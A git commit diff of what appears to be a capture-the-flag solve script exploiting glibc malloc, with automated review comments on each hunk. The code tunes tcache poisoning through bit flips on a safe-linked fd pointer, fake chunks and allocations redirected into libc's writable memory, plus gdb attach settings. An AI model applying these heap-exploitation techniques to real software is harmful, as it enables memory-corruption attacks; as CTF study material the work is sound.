commit b7fd983ed9bb424d6cdf40fe580e993119f1ae7e
parent dc05f4908638926f508fe86e5e483480621f5119
Author: Louis Burda <quent.burda@gmail.com>
Date: Fri, 26 Apr 2024 02:37:17 +0200
Save tech
Diffstat:
2 files changed, 17 insertions(+), 10 deletions(-)
diff --git a/solve/glibc b/solve/glibc
@@ -0,0 +1 @@
+/home/snx/ext/glibc
+\ No newline at end of file
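Review bot: The new `solve/glibc` entry pins an absolute path under one user's home directory (`/home/snx/ext/glibc`), which will not resolve on any other machine or in CI; the missing trailing newline suggests this is a symlink, though the diff does not show a mode line, so that is an inference. Since the gdb command in `solve/solve` now depends on it via `-ex "dir glibc"`, a checkout elsewhere silently loses glibc source resolution in the debugger. Consider a relative symlink target (or a documented environment variable) and, at minimum, a one-line comment in the solve script saying that `glibc` is expected to point at a glibc source tree matching the target's libc.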
diff --git a/solve/solve b/solve/solve
@@ -60,7 +60,7 @@ def adj(size):
def mmap_adj(size):
return size - 2 - 0x1000 # page aligned malloc header
-gdb = 'gdb -ex "set debug-file-directory $PWD/debug"' \
+gdb = 'gdb -ex "set debug-file-directory $PWD/debug" -ex "dir glibc"' \
+ ' -ex "target remote localhost:1025" -ex "b main" -ex "continue"'
run_in_new_terminal(["sh", "-c", f'sleep 1; sudo -E {gdb}'], kill_at_exit=False)
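Review bot: The new `-ex "dir glibc"` on the second line of the command uses a path relative to gdb's working directory, while the adjacent `set debug-file-directory $PWD/debug` is anchored on `$PWD`; under `sh -c` with `sudo -E` the two will only agree when the script is launched from `solve/`. Making both absolute avoids a silent "no source file" in the debugger: `gdb = 'gdb -ex "set debug-file-directory $PWD/debug" -ex "dir $PWD/glibc"' \`. The `sleep 1` before attaching to `localhost:1025` is a fixed delay rather than a readiness check, so the attach can race a slow gdbserver start; a short comment stating that assumption (`# assumes gdbserver on :1025 is listening within 1s`) would help the next person who sees `target remote` fail. The statement run continues outside this hunk.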
@@ -76,12 +76,12 @@ print("MMAP2", hex(mmap_size_2))
print("MMAP3", hex(mmap_size_3))
# Do some alignment for later.
-_ = alloc(cc() * mmap_size_2)
-_ = alloc(cc() * mmap_size_2)
+_ = alloc(cc() * mmap_adj(mmap_size_1))
+_ = alloc(cc() * mmap_adj(mmap_size_2))
# Prepare a tcache-able chunk for later.
-bin_size = 0x50
-top = alloc(adj(bin_size))
+bin_size = 0x80
+top = alloc(cc() * adj(bin_size))
# Add a padding chunk to prevent bad unmapping.
_ = alloc(cc() * mmap_adj(mmap_size_1)) # Slightly smaller to bypass malloc.c:3376
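Review bot: The change from `0x50` to `0x80` for `bin_size` and the switch of the two alignment allocations to `mmap_adj(mmap_size_1)` / `mmap_adj(mmap_size_2)` are not explained, yet the later `p64(bin_size^0b1)` write and the `flip_size` offset depend on these exact values. A why-comment on the `bin_size = 0x80` line would keep this from being re-tuned blindly, e.g. `# 0x80: must stay tcache-sized and line up with the flipped size field written into 'back' below — TODO confirm relation to flip_size`. The existing comment "Slightly smaller to bypass malloc.c:3376" cites a bare line number; since the commit now wires a glibc source tree into gdb, naming the glibc version (or quoting the condition being bypassed) would make that reference survive a version bump. The enclosing statement run starts and ends outside this hunk.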
@@ -105,7 +105,7 @@ assert(mmap_size_3 > mmap_size_1 ^ flip_size)
# We pretend front chunk is a small, non-mmaped tcache-able chunk.
data = cc() * mmap_adj(mmap_size_3)
offset = mmap_size_3 - flip_size
-back = alloc(data[:offset-8] + p64(bin_size ^ 0b1) + data[offset:])
+back = alloc(data[:offset-8] + p64(bin_size^0b1) + data[offset:])
io.interactive()
@@ -115,14 +115,19 @@ free(front)
# Free another chunk into same tcache.
free(top)
+io.interactive()
+
# Now the fd pointer of 'top' chunk is the fake chunk near libc.
# We use our second bit flip to make it point into libc.
-flip(top, -8, 0x400000)
+flipv(top, 0, 0x400000)
+
+io.interactive()
-# we can flip a bit through the protected address to redirect it
-# into the libc writable region (this is what the alignment is for)
+# Pop top chunk from bin.
+top = alloc(cc() * adj(bin_size))
-# allocate the buffer in libc and write to set size
+# Allocate the buffer in libc.
+libc = alloc(cc() * adj(bin_size))
# use edit to fixup the data
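Review bot: The two added `io.interactive()` calls (after `free(top)` and after `flipv(top, 0, 0x400000)`) hand the connection to the operator unconditionally, so as committed the script never reaches the `top`/`libc` allocations without manual intervention; if these are debugging pauses, gate them behind a flag such as `if DEBUG: io.interactive()` (whatever switch the script already uses, not visible here) so the non-interactive run still completes. The rewritten comment above `flipv` drops the removed explanation that the bit is flipped through the protected (safe-linked) fd value and that this is what the earlier alignment is for; keeping one sentence of that rationale next to the `0x400000` constant, e.g. `# flip lands on the mangled fd, so the decoded pointer depends on the heap alignment set up above`, would preserve the only description of why the magic value works. The statement run continues past the end of this hunk.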